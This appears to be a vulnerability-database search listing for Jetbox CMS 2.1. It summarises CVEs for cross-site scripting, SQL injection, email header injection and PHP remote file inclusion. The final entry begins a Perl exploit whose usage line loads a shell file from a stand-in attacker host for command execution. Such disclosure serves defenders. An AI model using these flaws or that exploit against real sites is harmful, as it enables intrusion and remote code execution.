17 matches found
Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability
No description provided by source...
CVE-2008-6174
Cross-site scripting XSS vulnerability in admin/postlister/index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the liste parameter...
Jetbox CMS 2.1 - liste Cross-Site Scripting
Jetbox CMS 2.1 - liste Cross-Site Scripting source: https://www.securityfocus.com/bid/31890/info Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the brows...
Jetbox CMS 2.1 - admincmsnav.php?nav_id SQL Injection
Jetbox CMS 2.1 - admincmsnav.php?navid SQL Injection source: https://www.securityfocus.com/bid/31824/info Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow a...
CVE-2007-2685
Multiple SQL injection vulnerabilities in index.php in Jetbox CMS 2.1 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 login parameter...
CVE-2007-2685
Multiple SQL injection vulnerabilities in index.php in Jetbox CMS 2.1 allow remote attackers to execute arbitrary SQL commands via the 1 view or 2 login parameter...
CVE-2007-2685
Jetbox CMS 2.1 has SQL injection vulnerabilities in index.php via the view and login parameters, allowing remote attackers to execute arbitrary SQL commands. Root cause: improper handling of input in Jetbox CMS 2.1 leads to injectable SQL. Exploitation is described as remote with no authenticatio...
CVE-2007-2684
Jetbox CMS 2.1 is affected by multiple information-disclosure vectors. The vulnerability arises from (1) direct requests to main_page.php, open_tree.php, and outputs.php, (2) a malformed view parameter to index.php enabling SQL-injection-like manipulation, and (3) the id[] parameter pass-through ...
CVE-2007-2731
CRLF injection vulnerability in formmail.php in Jetbox CMS 2.1 might allow remote attackers to inject arbitrary e-mail headers via LF %0A sequences in the subject parameter, a related issue to CVE-2007-1898...
Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation
source: https://www.securityfocus.com/bid/23989/info Jetbox CMS is prone to an input-validation vulnerabilitiy because it fails to adequately sanitize user-supplied input. Attackers can exploit this issue to send spam email in the context of the application. Jetbox 2.1 is vulnerable; other versio...
CVE-2006-4422
PHP remote file inclusion vulnerability in includes/phpdig/libs/searchfunction.php in Jetbox CMS 2.1 allows remote attackers to execute arbitrary PHP code via a URL in the relativescriptpath parameter, a different vector than CVE-2006-2270. NOTE: this issue has been disputed, and as of 20060830,...
CVE-2006-4422
CVE-2006-4422 describes a PHP remote file inclusion in Jetbox CMS 2.1. The vulnerability affects includes/phpdig/libs/search_function.php via a URL in the relative_script_path parameter, enabling arbitrary PHP code execution. This CVE is noted as having a vector different from CVE-2006-2270 and i...
CVE-2006-3584
CVE-2006-3584 affects Jetbox CMS 2.1 SR1. The vulnerability is in index.php where inputs passed in the URL are evaluated as PHP variable variables, allowing remote attackers to overwrite configuration variables. This is caused by improper handling/sanitization of URL parameters and can lead to di...
CVE-2006-3586
SQL injection vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to execute arbitrary SQL commands via the 1 frontsession COOKIE parameter and 2 view parameter in index.php, and the 3 login parameter in admin/cms/index.php...
CVE-2006-2270
PHP remote file inclusion vulnerability in includes/config.php in Jetbox CMS 2.1 allows remote attackers to execute arbitrary code via a URL in the relativescriptpath parameter...
CVE-2006-2270
CVE-2006-2270 : Jetbox CMS 2.1 has a PHP remote file inclusion in includes/config.php that allows an attacker to execute arbitrary PHP code by providing a URL in the relative_script_path parameter. The documents do not provide exploitation details or a published patch in the supplied material. Re...
Jetbox CMS 2.1 - relative_script_path Remote File Inclusion
Jetbox CMS 2.1 - relativescriptpath Remote File Inclusion !/usr/bin/perl JetBox CMS Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://jetbox.streamedge.co...